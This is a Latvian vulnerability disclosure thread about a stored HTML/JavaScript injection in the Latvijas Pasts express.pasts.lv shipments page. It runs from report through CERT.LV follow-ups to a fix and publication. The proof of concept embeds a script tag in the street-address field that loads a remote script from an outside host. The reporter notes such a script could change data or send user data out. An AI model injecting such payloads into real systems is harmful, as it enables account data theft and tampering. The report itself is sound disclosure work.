HTML/JS injekcijas "mani sūtījumi" sadaļā

Ietekmētais resurss:
express.pasts.lv
Apraksts:

Express.pasts.lv sadaļa "Mani sūtījumi" izvada sūtītāja vārdu un adresi, neveicot HTML kodēšanu. Tādējādi, ja adresē vai vārdā ir simboli, kam ir nozīme HTML valodā, tie tiek uztverti kā dokumenta daļa un izpildīti.

Tehniskais ievainojamības apraksts (PoC):

Sistēmā EKIS reģistrējot sūtījumu, laukā "Iela" norādīju šādu vērtību: K. Valdemāra <script src='https://naivist.net/s.js'></script> iela 2A.
Būtu sagaidāms, ka sadaļā "Mani sūtījumi", atlasot attiecīgās dienas sūtījumus, parādītos ar HTML entītijām kodēta vērtība &lt;script src=..., taču kodēšana netiek veikta. Rezultātā no vietnes https://naivist.net/s.js tiek ielādēts uzbrucēja sagatavots skripts (PoC scenārijā vienkārši izvadu vārdu "test") kas var gan veikt izmaiņas EKIS sistēmas datos, gan nosūtīt EKIS reģistrētos lietotāja datus uzbrucējam.

Šo pašu savulaik bija iespējams atkārtot arī caur API, pašlaik netiku pārbaudījis.

uQcQUQYda8_Latvijas_Pasts_HTMLi.png
Ieteiktais labojums:

Komentāri (20)

Generic placeholder image
edv1n5
05.03.2024 13:39:09

Sveiks, paldies par pieteikumu! Cenšos atdarināt XSS ievainojamību. Kad Tu reģistrējies, vai Tev bija līdzīgs kļūdas paziņojums?!

Statuss: Atvērts
05.03.2024 13:39:29

Ievainojamības ziņojuma statuss tika nomainīts no Jauns uz Atvērts. Izmaiņas veica edv1n5

Generic placeholder image
krissr
05.03.2024 13:56:09

Sveiki!
Šķiet, ka express.pasts.lv ir pieejams tikai Latvijas Pasta klientiem, kam ir līgums par šīs sistēmas izmantošanu, tāpēc "no malas" piereģistrēties varētu neizdoties. E-veikali pārsvarā sūtījumus pirkumu piegādēm piereģistrē caur API, bet pēc tam klientu portālā var veikt labojumus datos, izdrukāt iepakojuma uzlīmes, u.c.

Generic placeholder image
edv1n5
05.03.2024 16:30:24

Atveidoju ievainojamību, tur vairākos lauciņos varēja sasniegt XSS. Nodots izstrādātājiem. Paldies par darbu!

Generic placeholder image
Sanita CERT.LV
16.12.2024 09:19:33

@edv1n5
Labdien.

Lūdzu painformējiet par ievainojamības novēršanas gaitu.

Paldies!
CERT.LV

Generic placeholder image
edv1n5
16.12.2024 14:09:46

Labdien,

Šis ir apzināts biznesa risks, tādēļ uz šo ievainojamības labošanu šobrīd netiek atvēlēti resursi.

Cieņā,
Edvīns

Generic placeholder image
Sanita CERT.LV
26.08.2025 16:57:24

@Pasts

Lūdzu painformējiet par ievainojamības novēršanas gaitu.

Generic placeholder image
edv1n5
Programmas pārvaldītājs
04.09.2025 13:22:54

Sveika, Sanita!
Ievainojamības labošanai resursi ir atrasti un tā šobrīd tiek labota.

Generic placeholder image
Sanita CERT.LV
11.12.2025 10:15:10

@edv1n5
Labdien.

Lūdzu painformējiet par ievainojamības novēršanas gaitu.

Paldies!

Generic placeholder image
Sanita CERT.LV
15.05.2026 14:06:51

@Pasts, lūdzu painformējiet par ievainojamības novēršanas gaitu.

Generic placeholder image
OskarsZ
Programmas pārvaldītājs
25.05.2026 14:01:49

@Sanita Aktualizēju pieteikumu mūsu pusē.

Generic placeholder image
OskarsZ
Programmas pārvaldītājs
13.08.2026 11:53:27

Sveiki!
17.08 plānots ieviest labojumus, informēšu kad tiks ieviesti. Pēc labojumiem @krissr vai varēsiet lūdzu veikt pārbaudi arī no savas puses ?

Generic placeholder image
krissr
13.08.2026 11:58:13

Dodiet ziņu, kad labojums uzlikts, noteikti varam atkārtot to pašu testa scenāriju.

Generic placeholder image
OskarsZ
Programmas pārvaldītājs
17.08.2026 09:20:01

@krissr Ir ieviests produkcijā, lūgums notestēt.

Generic placeholder image
krissr
18.08.2026 08:25:38

Aprakstīto scenāriju vairs neizdodas atkārtot, HTML injekcija ir novērsta.

Statuss: Atrisināts
18.08.2026 08:30:48

Ievainojamības ziņojuma statuss tika nomainīts no Atvērts uz Atrisināts. Izmaiņas veica lauriskam

Programmas pārvaldītājs lauriskam lūdz publiskot ievainojamību šādā statusā: Pilnā apmērā
18.08.2026 08:30:55

Lūdzu izvērtēt ziņojuma publiskošanu!

Ievainojamības ziņojuma iesniedzējs krissr lūdz publiskot ievainojamību šādā statusā: Pilnā apmērā
18.08.2026 08:39:25

Lūdzu izvērtēt ziņojuma publiskošanu!

Generic placeholder image
OskarsZ
Programmas pārvaldītājs
18.08.2026 08:41:26

@krissr Paldies par iesaisti!

Sanita izmainīja ievaionjamības publiskošanas statusu uz: Pilnā apmērā
24.08.2026 17:53:57

Ievainojamības ziņojums publiskots!

PASTS
Vidēja
Atrisināts
Iesniegts
05.03.2024 12:13:50
Pēdējo reizi labots
24.08.2026 17:53:57
Ievainojamības ziņojuma iesniedzējs
krissr
Dalībnieki
-
18.08.2026 08:30:55
Programmas pārvaldītājs
lauriskam
18.08.2026 08:39:25
Ievainojamības ziņojuma iesniedzējs
krissr